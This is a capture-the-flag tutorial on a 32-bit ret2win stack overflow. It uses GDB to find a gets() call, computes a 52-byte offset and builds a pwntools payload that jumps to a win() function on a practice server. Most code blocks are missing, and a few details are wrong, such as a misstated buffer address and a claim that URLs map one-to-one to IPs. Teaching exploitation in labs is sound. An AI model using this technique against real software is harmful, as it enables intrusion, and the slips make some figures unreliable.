win32

Solving a 32-bit ret2win.

file-archive
3KB
archive

This binary is going to be the first introduction to a stack overflow. A stack overflow is the process of writing more bytes than are allocated, which causes you to (un)intentionally overwrite data. This vulnerability is caused when the size of the input is not checked and the stack is not regulated. We will make these two checks before attempting the buffer overflow.

What is the red line in the instructions?

From the instructions, we see this line:

nc vunrotc.cole-ellis.com 1100

nc (aka netcat) is a protocol that lets a user connect to an IP address at a port. What does that even mean? Let's break it down:

  • Every computer has an IP address. It's a unique public identifier for that computer.

  • Every computer has a list of ports (ranging from 0-65535). These ports host various services that other computers can access. Websites using HTTPS are served on port 443. This means that when you access a website under the hood, you connect to a remote computer on port 443.

    • The URL address is a type of mask for the IP address underneath. Every URL has a one-to-one correspondence to an IP address; we use URLS because they are easier to remember.

  • The first 1024 ports are reserved for various services (like HTTPS, HTTP, SSH, etc.). The rest of the ports are available for custom setup and use.

  • In this case, I set up the same binary I provided in the challenge to run on port 1100. When you connect to that port, you are connecting to the binary. When you pass your payload to the port, and it is executed, it correctly finds and prints my flag file. This means I provided you source code to prepare your payload, and a server for you to execute your payload so I can hide the flag.

If you want to test this, just run that netcat command in the terminal. You'll notice it prints the same output as running the win32 binary.

Now, let's move on to the binary.

Checking Security

Let's make the first security check using checksec.

The first and probably most important thing is that this is a 32-bit binary. This means that when we pass parameters, we will pass them on the stack. The top of the stack, when call is reached is the first parameter, the second top is the second parameter, etc.

We see that all protections are disabled. The most important check for the buffer overflow is that the canary is disabled.

Let's go into GDB and find where this function takes input. Inside read_in:

We see that this program uses gets for input. The man pages says this about gets:

The most important thing about gets is that gets does not check the size of the input. This means we can write as much as we want to the stack. This is the vulnerability that we are going to exploit.

Now that both vulnerability prerequisites have been checked, let's start figuring out how to execute the buffer overflow.

Disassembly

For this challenge, I am going to provide the source code to understand what is happening:

Let's do our analysis in GDB assuming that we don't have the source code (because, typically, we won't) and just use it to explain why things happen.

First, we check the functions available:

The three functions that we are interested in are win, read_in, and main. win logically appears to be the target, so let's figure out what happens there:

win makes a call to system, which the man pages says takes a char* (string) argument. From the source code, we see that this takes the argument "cat flag.txt" meaning that it opens the flag file and prints us its contents.

circle-exclamation

Now, let's check main:

We see that main just appears to call read_in and then return. So, let's go check read_in:

We see that this is where gets() is called and where we are going to overflow the buffer. We also notice that malloc() has yet to be called, meaning that the data is not being placed on the heap.

To confirm this, we check what's being passed to gets(). Let's set a breakpoint right before the call to gets() and check:

x/wx $esp (or pxw @ esp in radare2) shows me the value on the top of the stack. In 32-bit, this is how we pass parameters. This means that 0xffffd618 is being passed as the parameter to gets(), which is the address of the buffer.

Something peculiar that we notice is that 0xffffd618 (the location we're writing to) is close to the stack pointer (0xffffd600). I wonder, are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings (dm in radare2) to check the bounds of the various memory segments:

We see that our stack is located between 0xfffdd000 and 0xffffe000. Our buffer address is inside this range, meaning we are writing to the stack.

What power do we have?

Remember earlier that I said that gets() does no bounds checking, meaning that we can write as many bytes as we want? There are some important things on the stack right now, let's go check them out.

This looks like a lot of gibberish, but two numbers stand out in particular:

Why these two? The short answer is that the numbers were different! If we check info proc mappings again, we see:

This is executable memory located inside the win32 file. This is the code segment. This means that these locations are addresses in the code. Let's check what's here:

We see that these both point to instructions. The first one points to somewhere at the top of read_in, and the second one back in main. The first one is our base pointer (aka rbp) and the second one is the return pointer.

Let's understand how this happened.

Stack Frame

When a function is called, the following happens:

  1. The return pointer is pushed onto the stack. This is the address of the next instruction to execute after the function returns.

  2. The code then goes to the location referenced in the call instruction.

  3. The base pointer is pushed onto the stack. This is the address of the previous base pointer. We see that here in the code:

  1. The stack pointer is moved to the base pointer. This is the new base pointer.

  2. The stack pointer is moved down to make space for local variables.

  3. The function is executed.

When the function returns, the following happens:

  1. The stack pointer is moved to the base pointer.

  2. The base pointer is popped off the stack.

  3. The return pointer is popped off the stack and the code jumps to that location.

How do we leverage this?

  • We know that the return pointer is at some location in memory. When we call read_in, we subtract from the stack pointer.

  • We will write some number of bytes inside the space that was just allocated for the function.

  • If we write enough bytes (because the program isn't checking), we can overwrite the return pointer placed on the stack.

  • Without knowing any better, when the function terminates, it will find where it stored the return pointer and go there. It does not verify that the return pointer is a valid place in memory or that it's the same one it stored initially; _it just goes there_.

Let's make this happen.

Exploitation

We are still breakpointed at the call to gets(). Let's check the stack again:

This is the address we are going to write to. As a reminder, this is where we found the return pointer:

This means that in order to overwrite the return pointer, we need to write 0xffffd600 to 0xffffd64c. How many bytes is this? Let's get some Python practice:

This means that we need to write 52 bytes, and then we need to overwrite the return pointer. But where do we want to go? The win function! Let's get that address:

Let's use Python to make this a payload:

And what happens when we run this?

We... crashed. What does that mean? That means we either corrupted memory or we tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:

It's saying that it reached the address 0x35343331 and stopped. What does this mean?

  1. We now know that we control execution and were able to successfully deviate execution to another spot in memory.

  2. We didn't quite do it right because we didn't get to the win function. We need to figure out what happened.

Let's dive deeper into what is happening here:

  1. We notice that 0x353433331 is the hexadecimal of 5431, which is the start of what's in the payload. We see it's backward because the binary is written in little-endian architecture.

  2. We also notice that 134517158 is the hexadecimal of 080491a6, which is the address of win.

How can we get the hexadecimal to appear correctly in the payload?

This is where pwntools comes in. Pwntools has a packaging function that allows for the packaging of data into the correct size and format. In 32-bit, this function is p32(). We modify the exploit to be:

However, this won't copy correctly. Thankfully, pwntools comes to save us again and gives us a way to send this payload to the binary. Consider the following exploit:

Let's break this exploit down:

  • from pwn import * -- This imports the pwntools library into the program, just like an #include in C-type languages.

  • proc = process('./win32') -- This creates a process object that runs the win32 binary.

  • padding = b'A' * 0x34 -- This creates a variable that is 52 bytes of A characters. Note that you could use any characters, but A (0x41) is a common choice.

  • f_win = 0x080491a6 -- This creates a variable that is the address of the win function. It's common to store your addresses as variables so it's easier to read.

  • payload = p32(f_win) -- This creates a variable that is the address of the win function, but in the correct format for the binary.

  • buf = padding + payload -- This is the final string that will get sent off to the process.

  • proc.sendline(buf) -- This sends the payload to the process.

  • proc.interactive() -- This allows us to interact with the process after the payload is sent.

Let's run this exploit:

We see that cat gets called! That means our exploit worked, but since we're running locally, there is no flag.txt to find. Let's switch our process to target the remote server:

Now let's run this:

As we can see, the flag is printed!

Last updated